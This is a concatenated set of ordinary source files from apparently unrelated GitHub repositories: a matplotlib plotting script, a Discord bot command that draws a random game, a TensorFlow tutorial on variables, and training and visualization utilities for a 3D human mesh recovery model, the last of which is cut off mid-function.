# Load the precomputed results and the matching simulation input.
data = np.load("./Results/"+fileName+".npz")
inputData = np.load("./Inputs/" + inputName + ".npz")

n = inputData['n']
R = inputData['R']
x0 = inputData['x']
y0 = inputData['y']

phi = data['phi']
Tphi = data['Tphi']  # transmission vs (frequency, angle); columns are angles
frequencies = data['frequencies']
countf = frequencies.size
Rk = data['Rk']

# STIX fonts for publication-style math text.
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['font.family'] = 'STIXGeneral'
mpl.rcParams['legend.fontsize'] = 'medium'
mpl.rcParams['axes.labelsize'] = 'large'

# Plot two opposite directions (uhol = angle, in degrees: 90 and 270).
# NOTE(review): the (1 + uhol/1000.) factor appears to offset overlapping
# curves slightly for visibility — confirm it is not a physical scaling.
for uhol in range(90,360,180):
    plt.plot(frequencies, 2*pi/countf * Tphi[:,uhol]*(1+uhol/1000.), label = "%d" %(uhol) )

#plt.ylim(bottom=1e-6)
plt.legend(loc=4)
#plt.yscale("log")
plt.savefig("./"+plotName+".pdf")
#plt.show ()
| KlaraFickova/Diplomovka | Draw/smery-f.py | smery-f.py | py | 919 | python | en | code | 0 | github-code | 36 |
38799414939 | import discord
import bdg
import gamelist
import random
class SurpriseGameCommand(bdg.BdgCommand):
    """Slash command that draws a random game from the guild's game list."""

    header = {
        'name': "sortear_jogo",
        'description': "Lista de Jogos - Sorteie um jogo aleatório baseado no filtro especificado",
    }

    async def on_command(self, i: discord.Interaction, filtro: gamelist.GameFilter):
        """Reply with a randomly chosen game matching ``filtro``, or a
        warning when the filter yields nothing."""
        # Renamed from `gamelist`: the original local shadowed the imported
        # `gamelist` module used in this signature's annotations.
        games = self.bdg.get_gamelist(self.bdg.guild_collection(i.guild))
        # filter() yields the indices of matching games.
        available_games = list(games.filter(filtro))
        if not available_games:
            await i.response.send_message(":warning: | Não há nenhum jogo disponível com esse filtro", ephemeral=True)
            return
        # random.choice is clearer than indexing with randint(0, len - 1).
        game = games[random.choice(available_games)]
        await i.response.send_message(f":tada: | O jogo sorteado é... ||**{game.name.upper()}!**||")
| DanielKMach/BotDusGuri | src/commands/gamelist/surprise.py | surprise.py | py | 814 | python | pt | code | 1 | github-code | 36 |
44396010983 | import tensorflow as tf
import os
import cProfile
def variable_turn_off_gradient():
    """Demo: trainable=False creates a variable that gradient tapes skip."""
    step_counter = tf.Variable(1, trainable=False)
    print(step_counter)
def variable_placing():
    """Pin variable/tensor creation and a matmul to the CPU, then print the product."""
    with tf.device('CPU:0'):
        lhs = tf.Variable([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
        rhs = tf.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
        product = tf.matmul(lhs, rhs)
        print(product)
if __name__ == '__main__':
    """
    recommended way to represent shared, persistent state your program manipulates
    Higher level libraries like tf.keras use tf.Variable to store model parameters
    A variable looks and acts like a tensor, and, in fact, is a data structure backed by a tf.Tensor
    """
    # A Variable wraps a tensor and shares its shape/dtype.
    my_tensor = tf.constant([[1.0, 2.0], [3.0, 4.0]])
    my_variable = tf.Variable(my_tensor)
    print("Shape: ", my_variable.shape)
    print("DType: ", my_variable.dtype)
    print("As NumPy: ", my_variable.numpy())
    print("\nViewed as a tensor:", tf.convert_to_tensor(my_variable))
    print("\nIndex of highest value:", tf.argmax(my_variable))
    # This creates a new tensor; it does not reshape the variable.
    print("\nCopying and reshaping: ", tf.reshape(my_variable, [1, 4]))
    # Variables can be all kinds of types, just like tensors
    bool_variable = tf.Variable([False, False, False, True])
    complex_variable = tf.Variable([5 + 4j, 6 + 1j])
    # assign
    a = tf.Variable([2.0, 3.0])
    a.assign([1, 2]) # This will keep the same dtype, float32
    # a.assign([1.0, 2.0, 3.0]) # Not allowed as it resizes the variable
    # copy, two variables will not share the same memory
    a = tf.Variable([2.0, 3.0])
    b = tf.Variable(a) # Create b based on the value of a
    a.assign([5, 6])
    print(a.numpy()) # [5. 6.]
    print(b.numpy()) # [2. 3.]
    # assign_add / assign_sub mutate in place and return the variable.
    print(a.assign_add([2, 3]).numpy()) # [7. 9.]
    print(a.assign_sub([7, 9]).numpy()) # [0. 0.]
    variable_turn_off_gradient()
    variable_placing()
| jk983294/morph | book/tensorflow/core/variables.py | variables.py | py | 1,966 | python | en | code | 0 | github-code | 36 |
70553071464 | import time, datetime
import numpy as np
import os
import os.path as osp
import torch
import torchvision
import matplotlib.pyplot as plt
import torchvision.utils as vutils
import torch.nn.functional as F
import cv2
import glob
import random
from lib.utils.eval_utils import (
batch_compute_similarity_transform_torch,
)
from lib.utils.geometry import batch_rodrigues
def inverse_normalize(tensor):
    """Undo ImageNet normalization in place (channel <- channel * std + mean).

    Mutates and returns the same (C, H, W) tensor.
    """
    imagenet_mean = [0.485, 0.456, 0.406]
    imagenet_std = [0.229, 0.224, 0.225]
    for channel, mean, std in zip(tensor, imagenet_mean, imagenet_std):
        channel.mul_(std).add_(mean)
    return tensor
def normalize(tensor):
    """Apply ImageNet normalization in place (channel <- (channel - mean) / std).

    Mutates and returns the same (C, H, W) tensor.
    """
    imagenet_mean = [0.485, 0.456, 0.406]
    imagenet_std = [0.229, 0.224, 0.225]
    for channel, mean, std in zip(tensor, imagenet_mean, imagenet_std):
        channel.sub_(mean).div_(std)
    return tensor
class AverageMeter(object):
    """Tracks the most recent value plus a running sum, count and average."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Clear all statistics back to zero."""
        self.val, self.avg, self.sum, self.count = 0, 0, 0, 0

    def update(self, val, n=1):
        """Record *val* observed *n* times and refresh the running average."""
        self.val = val
        self.sum += val * n
        self.count += n
        # Leave avg untouched when nothing has been counted yet.
        self.avg = self.sum / self.count if self.count != 0 else self.avg
def get_HHMMSS_from_second(seconds):
    """Format a duration given in seconds as an "HH:MM:SS" string."""
    return time.strftime("%H:%M:%S", time.gmtime(seconds))
def save_checkpoint(state, output_dir, filename):
    """Serialize a model/optimizer state dict to results/<output_dir>/save_pth/<filename>."""
    checkpoint_dir = "results/{}/save_pth".format(output_dir)
    if not osp.exists(checkpoint_dir):
        os.makedirs(checkpoint_dir)
    torch.save(state, osp.join(checkpoint_dir, filename))
def save_img(img, output_dir, filename, epoch=None, img_path=None, test_dataset=None, test_idx=None, vflip=False, hflip=False):
    """Save a (possibly tiled) image tensor under results/<output_dir>/...

    The destination directory depends on which of epoch/img_path/test_dataset
    are given (train vs. eval layouts). 4-D input is treated as a stack of
    jigsaw tiles, 3-D as a single CHW image, 2-D as a single-channel map.
    NOTE(review): if none of the three path branches match, `save_path` is
    never assigned and the osp.exists() call below raises NameError -- confirm
    callers always pass one of the expected argument combinations.
    """
    if isinstance(img, torch.Tensor):
        img = img.cpu()
    if isinstance(img_path, int):
        img_path = str(img_path)
        root = "results/{}/save_output_train".format(output_dir)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, img_path)
    elif epoch and img_path:
        dataset = img_path.split("/")[2]
        root = "results/{}/save_output_train/{}".format(output_dir, dataset)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
    elif test_dataset:
        save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
    if not osp.exists(save_path):
        os.makedirs(save_path)
    # For jigsaw image with tile
    if len(img.shape) == 4: # tile, channel, width, height
        for tile_idx, _img_tile in enumerate(img):
            # One file per tile: <name>_<tile_idx>.jpg
            _filename = "_".join([filename.replace(".jpg", ""), str(tile_idx)]) + ".jpg"
            # _img = np.transpose(vutils.make_grid(_img_tile, normalize=True), (1, 2, 0))
            # _img = _img.numpy()
            _img = inverse_normalize(_img_tile).detach().numpy()
            _img = np.transpose(_img, (1, 2, 0))
            if vflip:
                _img = _img[::-1, :, :]
            if hflip:
                _img = _img[:, ::-1, :]
            plt.imsave(osp.join(save_path, _filename), _img)
    # For a image
    elif len(img.shape) == 3: # channel, width, height
        if isinstance(img, torch.Tensor):
            # if filename == "reconst_img.jpg":
            #     img = np.transpose(vutils.make_grid(img, normalize=True), (1, 2, 0))
            #     img = img.numpy()
            #     plt.imsave(osp.join(save_path, filename), img)
            # Rendering outputs are already in [0, 1]; save via OpenCV (BGR).
            if filename in ["detach.jpg", "rendering.jpg", "rendering_ren.jpg", "rendering_bg.jpg", "rendering1.jpg", "rendering_ren1.jpg",
                            "rendering2.jpg", "rendering_ren2.jpg", "rendering3.jpg", "rendering_ren3.jpg",
                            "rendering4.jpg", "rendering_ren4.jpg"]:
                img = np.transpose(img, (1, 2, 0))
                img = img.numpy()
                cv2.imwrite(osp.join(save_path, filename), 255*img[:, :, ::-1])
            else:
                # Everything else is ImageNet-normalized; undo before saving.
                img = inverse_normalize(img).detach().numpy()
                img = np.transpose(img, (1, 2, 0))
                plt.imsave(osp.join(save_path, filename), img)
            # if vflip:
            #     img = img[::-1, :, :]
            # if hflip:
            #     img = img[:, ::-1, :]
    elif len(img.shape) == 2: # width, height
        if isinstance(img, torch.Tensor):
            img = img[None, :, :]
            img = np.transpose(vutils.make_grid(img, normalize=True), (1, 2, 0))
            img = img.numpy()
            # img = inverse_normalize(img).detach().numpy()[:, :, None]
            # img = np.transpose(img, (1, 2, 0))
        if vflip:
            img = img[::-1, :, :]
        if hflip:
            img = img[:, ::-1, :]
        plt.imsave(osp.join(save_path, filename), img)
def save_all_img(img_dict, output_dir, epoch=None, img_path=None, test_dataset=None, test_idx=None, vflip=False, hflip=False):
    """Save every image in *img_dict* via save_img.

    img_dict maps filename -> image tensor/array; all remaining arguments are
    forwarded unchanged to save_img.
    """
    for name in img_dict:
        save_img(img_dict[name], output_dir, name, epoch, img_path,
                 test_dataset, test_idx, vflip, hflip)
def save_mesh(verts, faces, output_dir, epoch, img_path=None, test_dataset=None, test_idx=None):
    """Write a (V, 3) vertex tensor and (F, 3) face tensor as a Wavefront OBJ.

    Destination directory follows the same train/eval layout as save_img.
    Only writes when verts is 2-D (a single mesh, not a batch).
    """
    filename = "mesh.obj"
    # NOTE(review): `img` is assigned but never used below -- likely leftover.
    img = verts.cpu().numpy()
    faces = faces.cpu().numpy()
    if isinstance(img_path, int):
        img_path = str(img_path)
        root = "results/{}/save_output_train".format(output_dir)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, img_path)
    elif test_dataset is not None and test_idx is not None:
        save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
    else:
        dataset = img_path.split("/")[2]
        root = "results/{}/save_output_train/{}".format(output_dir, dataset)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
    if not osp.exists(save_path):
        os.makedirs(save_path)
    if len(verts.shape) == 2:
        with open(osp.join(save_path, filename), "w") as f:
            for verts_xyz in verts:
                f.write("v {} {} {}\n".format(verts_xyz[0], verts_xyz[1], verts_xyz[2]))
            # OBJ face indices are 1-based, hence the +1.
            for face in faces:
                f.write("f {} {} {}\n".format(face[0]+1, face[1]+1, face[2]+1))
def save_templates_info(test_templates, output_dir, filename):
    """Write one template string per line to results/<output_dir>/save_txt/<filename>."""
    txt_dir = "results/{}/save_txt".format(output_dir)
    if not osp.exists(txt_dir):
        os.makedirs(txt_dir)
    target = osp.join(txt_dir, filename)
    with open(target, "w") as handle:
        handle.writelines("\n".join(test_templates))
def save_joints2d_img(gt_keypoints_2d, pred_keypoints_2d, output_dir, epoch, img_path):
    """
    save image of joints2d on 2d coordinate while training

    Draws GT joints/bones in red and predicted ones in blue on an inverted-y
    axis (image coordinates) and writes joints2d.jpg to the train layout dir.
    """
    # Skeleton edges as (start_joint, end_joint) index pairs.
    line_list = [
        [ 0, 1 ],
        [ 1, 2 ],
        [ 3, 4 ],
        [ 4, 5 ],
        [ 6, 7 ],
        [ 7, 8 ],
        [ 8, 2 ],
        [ 8, 9 ],
        [ 9, 3 ],
        [ 2, 3 ],
        [ 8, 12],
        [ 9, 10],
        [12, 9 ],
        [10, 11],
        [12, 13],
    ]
    if isinstance(img_path, int):
        img_path = str(img_path)
        root = "results/{}/save_output_train".format(output_dir)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, img_path)
    else:
        dataset = img_path.split("/")[2]
        root = "results/{}/save_output_train/{}".format(output_dir, dataset)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
    if not osp.exists(save_path):
        os.makedirs(save_path)
    plt.figure()
    ax = plt.subplot()
    # Flip y so the plot matches image-space orientation.
    ax.invert_yaxis()
    gt_2ds = gt_keypoints_2d.clone()
    gt_2ds = gt_2ds.cpu()
    pred_2ds = pred_keypoints_2d.clone()
    pred_2ds = pred_2ds.cpu().detach()
    for joint_idx, (gt_2d, pred_2d) in enumerate(zip(gt_2ds, pred_2ds)):
        ax.scatter(gt_2d[0], gt_2d[1], marker='o', s=2, c="r")
        ax.text(gt_2d[0], gt_2d[1], joint_idx+1)
        ax.scatter(pred_2d[0], pred_2d[1], marker='o', s=2, c="b")
        ax.text(pred_2d[0], pred_2d[1], joint_idx+1)
    for start_point, end_point in line_list:
        # NOTE(review): these two self-assignments are no-ops.
        start_point = start_point
        end_point = end_point
        ax.plot([gt_2ds[start_point][0], gt_2ds[end_point][0]], [gt_2ds[start_point][1], gt_2ds[end_point][1]], "r", linewidth=2)
        ax.plot([pred_2ds[start_point][0], pred_2ds[end_point][0]], [pred_2ds[start_point][1], pred_2ds[end_point][1]], "b", linewidth=2)
    plt.savefig(osp.join(save_path, "joints2d.jpg"))
    plt.close()
def save_joints3d_img(gt_keypoints_3d, pred_keypoints_3d, output_dir, epoch=None, img_path=None, test_dataset=None, test_idx=None):
    """
    save image of joints3d on 3d coordinate while training

    Draws GT joints/bones in red and predicted ones in blue in a 3D axes and
    writes joints3d.jpg to the train or eval layout directory.
    """
    # Skeleton edges as (start_joint, end_joint) index pairs.
    line_list = [
        [ 0, 1 ],
        [ 1, 2 ],
        [ 3, 4 ],
        [ 4, 5 ],
        [ 6, 7 ],
        [ 7, 8 ],
        [ 8, 2 ],
        [ 8, 9 ],
        [ 9, 3 ],
        [ 2, 3 ],
        [ 8, 12],
        [ 9, 10],
        [12, 9 ],
        [10, 11],
        [12, 13],
    ]
    if isinstance(img_path, int):
        img_path = str(img_path)
        root = "results/{}/save_output_train".format(output_dir)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, img_path)
    elif epoch and img_path:
        dataset = img_path.split("/")[2]
        root = "results/{}/save_output_train/{}".format(output_dir, dataset)
        epoch = "epoch"+str(epoch)
        save_path = osp.join(root, epoch, ("_".join(img_path.split("/")[-2:])).replace(".jpg", ""))
    elif test_dataset is not None and test_idx is not None:
        save_path = "results/{}/eval_data/{}_{}/{}".format(output_dir, test_dataset, epoch, test_idx)
    if not osp.exists(save_path):
        os.makedirs(save_path)
    plt.figure()
    ax = plt.subplot(1, 1, 1, projection='3d')
    gt_3ds = gt_keypoints_3d.clone()
    gt_3ds = gt_3ds.cpu()
    pred_3ds = pred_keypoints_3d.clone()
    pred_3ds = pred_3ds.cpu().detach()
    for joint_idx, (gt_3d, pred_3d) in enumerate(zip(gt_3ds, pred_3ds)):
        ax.scatter(gt_3d[0], gt_3d[1], gt_3d[2], marker='o', s=2, c="r")
        ax.text(gt_3d[0], gt_3d[1], gt_3d[2], joint_idx+1)
        ax.scatter(pred_3d[0], pred_3d[1], pred_3d[2], marker='o', s=2, c="b")
        ax.text(pred_3d[0], pred_3d[1], pred_3d[2], joint_idx+1)
    for start_point, end_point in line_list:
        # NOTE(review): these two self-assignments are no-ops.
        start_point = start_point
        end_point = end_point
        ax.plot(
            [gt_3ds[start_point][0], gt_3ds[end_point][0]],
            [gt_3ds[start_point][1], gt_3ds[end_point][1]],
            [gt_3ds[start_point][2], gt_3ds[end_point][2]],
            color="r",
            linewidth=2)
        ax.plot(
            [pred_3ds[start_point][0], pred_3ds[end_point][0]],
            [pred_3ds[start_point][1], pred_3ds[end_point][1]],
            [pred_3ds[start_point][2], pred_3ds[end_point][2]],
            color="b",
            linewidth=2)
    plt.savefig(osp.join(save_path, "joints3d.jpg"))
    plt.close()
def get_acc(output, label):
    """Top-1 accuracy in percent of class scores *output* against *label*.

    output: (N, C) score tensor; label: (N,) class-index tensor.
    """
    n_total = output.shape[0]
    predictions = torch.argmax(output, dim=1)
    n_correct = (predictions == label).sum().item()
    return n_correct / n_total * 100
def spin2h36m_joint(spins, device):
    """
    Get h36m 14 joints from spin 49 joints.

    Args:
        spins: (49, ...) tensor of SPIN joints.
        device: unused; kept for backward compatibility with existing callers
            (the original built a one-hot selection matrix on this device).

    Returns:
        (14, ...) tensor containing SPIN rows 25-38, same dtype/device as
        `spins`.
    """
    # Direct row indexing replaces the original dense 14x49 matmul, which
    # allocated a one-hot matrix just to select these rows.
    h36m_index_list = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38]
    return spins[h36m_index_list]
def get_spherical_coords(X):
    """Map N x 3 cartesian points to N x 2 spherical UV coords in [-1, 1].

    u comes from the azimuth, v from the inclination.
    """
    radius = np.linalg.norm(X, axis=1)
    # Inclination (angle from +z) and azimuth (angle in the xy-plane).
    inclination = np.arccos(X[:, 2] / radius)
    azimuth = np.arctan2(X[:, 1], X[:, 0])
    # Rescale both angles to [-1, 1].
    vv = (inclination / np.pi) * 2 - 1
    uu = ((azimuth + np.pi) / (2 * np.pi)) * 2 - 1
    return np.stack([uu, vv], 1)
def compute_uvsampler(verts, faces, tex_size=2):
    """
    For this mesh, pre-computes the UV coordinates for
    F x T x T points.

    Args:
        verts: (V, 3) vertex array (points assumed on/near the unit sphere).
        faces: (F, 3) integer array of triangle vertex indices.
        tex_size: T, number of samples per triangle axis (>= 2).

    Returns F x T x T x 2
    """
    # FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24; the
    # builtin float is the documented drop-in replacement (same float64 dtype).
    alpha = np.arange(tex_size, dtype=float) / (tex_size-1)
    beta = np.arange(tex_size, dtype=float) / (tex_size-1)
    import itertools
    # Barycentric coordinate values
    coords = np.stack([p for p in itertools.product(*[alpha, beta])])
    vs = verts[faces]
    # Compute alpha, beta (this is the same order as NMR)
    v2 = vs[:, 2]
    v0v2 = vs[:, 0] - vs[:, 2]
    v1v2 = vs[:, 1] - vs[:, 2]
    # F x 3 x T*2
    samples = np.dstack([v0v2, v1v2]).dot(coords.T) + v2.reshape(-1, 3, 1)
    # F x T*2 x 3 points on the sphere
    samples = np.transpose(samples, (0, 2, 1))
    # Now convert these to uv.
    uv = get_spherical_coords(samples.reshape(-1, 3))
    # uv = uv.reshape(-1, len(coords), 2)
    uv = uv.reshape(-1, tex_size, tex_size, 2)
    return uv
def train_only_3task_network(
    HMR,
    context_encoder_net,
    discriminator,
    jigsaw_puzzle_net,
    rotation_net,
    loss_fn_BCE,
    loss_fn_MSE,
    loss_fn_CE,
    losses_CE,
    losses_DC,
    acces_JP,
    losses_JP,
    acces_ROT,
    losses_ROT,
    discriminator_optimizer,
    context_encoder_optimizer,
    jigsaw_puzzle_optimizer,
    rotation_optimizer,
    img,
    context_encoder_input,
    center_crop_img,
    jigsaw_input,
    jigsaw_order,
    rotation_img,
    rotation_idx,
    num_patch,
    ones,
    zeros,
    batch_size,
):
    """Train only the three self-supervised task heads (context encoder +
    discriminator, jigsaw classifier, rotation classifier) on top of frozen
    HMR features; HMR itself is not optimized here.

    Returns the 224x224 inpainted image batch (input with the 64x64 center
    replaced by the context-encoder output), for visualization.
    """
    ### Context Encoder ###
    # Update Discriminator
    feature_ce = HMR(context_encoder_input, return_only_features=True)
    feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
    output_ce = context_encoder_net(feature_ce)
    # Paste the predicted 64x64 patch back into the center of the input.
    output_ce_224 = context_encoder_input.clone()
    output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
    output_fake = discriminator(output_ce_224)
    output_real = discriminator(img)
    loss_BCE_fake = loss_fn_BCE(output_fake, zeros)
    loss_BCE_real = loss_fn_BCE(output_real, ones)
    loss_BCE = loss_BCE_fake + loss_BCE_real
    losses_DC.update(loss_BCE.item(), batch_size)
    discriminator_optimizer.zero_grad()
    loss_BCE.backward()
    discriminator_optimizer.step()
    # Update Decoder
    # Re-run the forward pass because the graph was consumed by backward().
    feature_ce = HMR(context_encoder_input, return_only_features=True)
    feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
    output_ce = context_encoder_net(feature_ce)
    output_ce_224 = context_encoder_input.clone()
    output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
    output_fake = discriminator(output_ce_224)
    loss_BCE = loss_fn_BCE(output_fake, ones)
    loss_MSE = loss_fn_MSE(output_ce, center_crop_img)
    # Heavily weight reconstruction over the adversarial term.
    loss_ce = 0.001 * loss_BCE + 0.999 * loss_MSE
    losses_CE.update(loss_ce.item(), batch_size)
    context_encoder_optimizer.zero_grad()
    loss_ce.backward()
    context_encoder_optimizer.step()
    ### Jigsaw Puzzle ###
    # Update classifier
    _jigsaw_input = jigsaw_input.permute(1, 0, 2, 3, 4) # tile, batch, c, w, h
    # Concatenate per-tile features plus the full-image feature.
    feature_jp = list()
    for i in range(num_patch):
        feature_jp.append(HMR(_jigsaw_input[i], return_only_features=True))
    feature_jp.append(HMR(img, return_only_features=True))
    feature_jp = torch.cat(feature_jp, 1)
    output_jp = jigsaw_puzzle_net(feature_jp)
    acc_jp = get_acc(output_jp, jigsaw_order)
    acces_JP.update(acc_jp, batch_size)
    loss_jp = loss_fn_CE(output_jp, jigsaw_order)
    losses_JP.update(loss_jp.item(), batch_size)
    jigsaw_puzzle_optimizer.zero_grad()
    loss_jp.backward()
    jigsaw_puzzle_optimizer.step()
    ### Rotation ###
    # Update rotation net
    feature_rot = HMR(rotation_img, return_only_features=True)
    output_rot = rotation_net(feature_rot)
    acc_rot = get_acc(output_rot, rotation_idx)
    acces_ROT.update(acc_rot, batch_size)
    loss_rot = loss_fn_CE(output_rot, rotation_idx)
    # NOTE(review): other meters receive .item(); this one gets the tensor --
    # confirm AverageMeter arithmetic tolerates tensors here.
    losses_ROT.update(loss_rot, batch_size)
    rotation_optimizer.zero_grad()
    loss_rot.backward()
    rotation_optimizer.step()
    return output_ce_224
def train_hmr_using_3task(
    HMR,
    context_encoder_net,
    discriminator,
    jigsaw_puzzle_net,
    rotation_net,
    loss_fn_BCE,
    loss_fn_MSE,
    loss_fn_CE,
    losses_CE,
    acces_JP,
    losses_JP,
    acces_ROT,
    losses_ROT,
    losses_HMR_3task,
    img,
    context_encoder_input,
    center_crop_img,
    jigsaw_input,
    jigsaw_order,
    rotation_img,
    rotation_idx,
    num_patch,
    ones,
    zeros,
    batch_size,
    args,
):
    """Compute the combined self-supervised loss (context encoding, jigsaw,
    rotation) used to train the HMR backbone; no optimizer steps are taken
    here -- the caller backpropagates the returned loss.

    Returns (weighted total loss, inpainted 224x224 image batch).
    """
    # loss for HMR - ce
    feature_ce = HMR(context_encoder_input, return_only_features=True)
    feature_ce = feature_ce.reshape(-1, 2048, 1, 1)
    output_ce = context_encoder_net(feature_ce)
    # Paste the predicted 64x64 patch back into the center of the input.
    output_ce_224 = context_encoder_input.clone()
    output_ce_224[:, :, 80:144, 80:144] = output_ce.clone()
    output_fake = discriminator(output_ce_224)
    loss_BCE = loss_fn_BCE(output_fake, ones)
    loss_MSE = loss_fn_MSE(output_ce, center_crop_img)
    loss_ce = 0.001 * loss_BCE + 0.999 * loss_MSE
    losses_CE.update(loss_ce.item(), batch_size)
    # loss for HMR - jp
    _jigsaw_input = jigsaw_input.permute(1, 0, 2, 3, 4) # tile, batch, c, w, h
    feature_jp = list()
    for i in range(num_patch):
        feature_jp.append(HMR(_jigsaw_input[i], return_only_features=True))
    feature_jp.append(HMR(img, return_only_features=True))
    feature_jp = torch.cat(feature_jp, 1)
    output_jp = jigsaw_puzzle_net(feature_jp)
    acc_jp = get_acc(output_jp, jigsaw_order)
    acces_JP.update(acc_jp, batch_size)
    loss_jp = loss_fn_CE(output_jp, jigsaw_order)
    losses_JP.update(loss_jp.item(), batch_size)
    # loss for HMR - rot
    feature_rot = HMR(rotation_img, return_only_features=True)
    output_rot = rotation_net(feature_rot)
    acc_rot = get_acc(output_rot, rotation_idx)
    acces_ROT.update(acc_rot, batch_size)
    loss_rot = loss_fn_CE(output_rot, rotation_idx)
    # NOTE(review): tensor (not .item()) passed to the meter, unlike the others.
    losses_ROT.update(loss_rot, batch_size)
    # Per-task weights, then a global scale, all from CLI args.
    loss_HMR = args.ce_weight * loss_ce + args.jp_weight * loss_jp + args.rot_weight * loss_rot
    loss_HMR = args.total_weight * loss_HMR
    losses_HMR_3task.update(loss_HMR.item(), batch_size)
    return loss_HMR, output_ce_224
def train_hmr_using_joints(
    HMR,
    loss_fn_keypoints,
    losses_HMR_joints3d,
    img,
    gt_keypoints_2d,
    gt_keypoints_3d,
    has_joints3d,
    joint_mapper_gt,
    batch_size,
    device,
    args,
):
    """Supervised keypoint loss for HMR: confidence-weighted 2D loss plus
    pelvis-centered 3D loss (only for samples flagged by has_joints3d).

    Returns (total loss, MPJPE in mm, PA-MPJPE in mm, #samples with 3D GT).
    No optimizer step is taken here.
    """
    ### training HMR resnet update using joints info
    output = HMR(img)
    output = output[-1]
    ### calcuate loss of 2d joints ###
    pred_keypoints_2d = output["kp_2d"]
    # Last channel of the GT keypoints is a per-joint confidence weight.
    conf = gt_keypoints_2d[:, :, -1].unsqueeze(-1).clone()
    joints2d_loss = (conf * loss_fn_keypoints(pred_keypoints_2d, gt_keypoints_2d[:, :, :-1])).mean()
    joints2d_loss = 5*joints2d_loss
    ### calcuate loss of 3d joints ###
    # Skip the first 25 predicted joints (2D/openpose-style joints in SPIN order).
    pred_keypoints_3d = output["kp_3d"][:, 25:, :]
    conf = gt_keypoints_3d[:, :, -1].unsqueeze(-1).clone()
    gt_keypoints_3d = gt_keypoints_3d[:, :, :-1].clone()
    gt_keypoints_3d = gt_keypoints_3d[has_joints3d==1]
    conf = conf[has_joints3d==1]
    pred_keypoints_3d = pred_keypoints_3d[has_joints3d==1]
    if len(gt_keypoints_3d) > 0:
        # Root-center both skeletons at the pelvis (midpoint of joints 2 and 3).
        gt_pelvis = (gt_keypoints_3d[:, 2, :] + gt_keypoints_3d[:, 3, :]) / 2
        gt_keypoints_3d = gt_keypoints_3d - gt_pelvis[:, None, :]
        pred_pelvis = (pred_keypoints_3d[:, 2, :] + pred_keypoints_3d[:, 3, :]) / 2
        pred_keypoints_3d = pred_keypoints_3d - pred_pelvis[:, None, :]
        joints3d_loss = (conf*loss_fn_keypoints(pred_keypoints_3d, gt_keypoints_3d)).mean()
        # Evaluation metrics (detached): MPJPE and Procrustes-aligned MPJPE.
        pred_j3ds = pred_keypoints_3d[:, joint_mapper_gt, :].clone().detach()
        target_j3ds = gt_keypoints_3d[:, joint_mapper_gt, :].clone().detach()
        errors = torch.sqrt(((pred_j3ds - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
        S1_hat = batch_compute_similarity_transform_torch(pred_j3ds, target_j3ds)
        errors_pa = torch.sqrt(((S1_hat - target_j3ds) ** 2).sum(dim=-1)).mean(dim=-1).cpu().numpy()
        m2mm = 1000
        mpjpe = np.mean(errors) * m2mm
        pa_mpjpe = np.mean(errors_pa) * m2mm
        num_data = len(gt_keypoints_3d)
    else:
        # No 3D annotations in this batch: zero loss, zero metrics.
        joints3d_loss = torch.FloatTensor(1).fill_(0.).to(device).mean()
        mpjpe = np.array(0)
        pa_mpjpe = np.array(0)
        num_data = len(gt_keypoints_3d)
    total_loss = joints2d_loss
    joints3d_loss = 5*joints3d_loss
    total_loss += joints3d_loss
    losses_HMR_joints3d.update(joints3d_loss.item(), batch_size)
    # Global scale applied to the summed keypoint losses.
    total_loss *= 60
    return total_loss, mpjpe, pa_mpjpe, num_data
def train_texture_net(
    HMR,
    texture_net,
    img_renderer,
    loss_fn_MSE,
    loss_fn_mask,
    losses_texture_ori_img,
    losses_seg,
    losses_texture_total,
    texture_net_optimizer,
    img,
    black_img,
    batch_size,
    args,
    gt_mask,
    has_mask,
    train_first_stage
):
    """Train the texture network against the masked input image (and, in the
    second stage, also against the GT segmentation).

    First stage: steps texture_net_optimizer here and returns
    (mask_est, detach_images, rendering, vertices).
    Second stage: returns (loss, mask_est, detach_images, rendering, vertices)
    and leaves the optimizer step to the caller.
    """
    output = HMR(img)
    output = output[-1]
    vertices = output['verts']
    # First 3 theta values are the weak-perspective camera parameters.
    cam = output['theta'][:, :3]
    textures = texture_net(img)
    textures = textures.expand(-1, -1, 2, 2, 2, -1)
    mask = gt_mask.clone().detach()
    mask_est, rendering = img_renderer(vertices, cam, textures)
    # Keep only the person pixels; fill the background with black.
    valid_mask = mask > 0
    valid_mask = valid_mask[:, None, :, :].type(torch.int)
    detach_images = img * valid_mask + black_img * (1-valid_mask)
    # inverse_normalize mutates in place; loop matches rendering's [0,1] range.
    for i in range(batch_size):
        detach_images[i] = inverse_normalize(detach_images[i])
    #======================================================================================#
    #   loss_texture       => MSE loss (texture images with bg, original img)
    #   loss_seg           => MSE loss (segmentation images, target seg)
    #   loss_texture_BCE   => BCE loss (texture images with bg, Real(1))
    #   loss_texture_total => SUM(loss_texture, loss_seg, loss_texture_BCE)
    #======================================================================================#
    loss_texture_ori_img = loss_fn_MSE(detach_images[has_mask==1], rendering[has_mask==1])
    losses_texture_ori_img.update(loss_texture_ori_img.item(), batch_size)
    loss_all = args.rendering_weight*loss_texture_ori_img
    if train_first_stage:
        texture_net_optimizer.zero_grad()
        loss_all.backward()
        texture_net_optimizer.step()
        return mask_est, detach_images, rendering, vertices
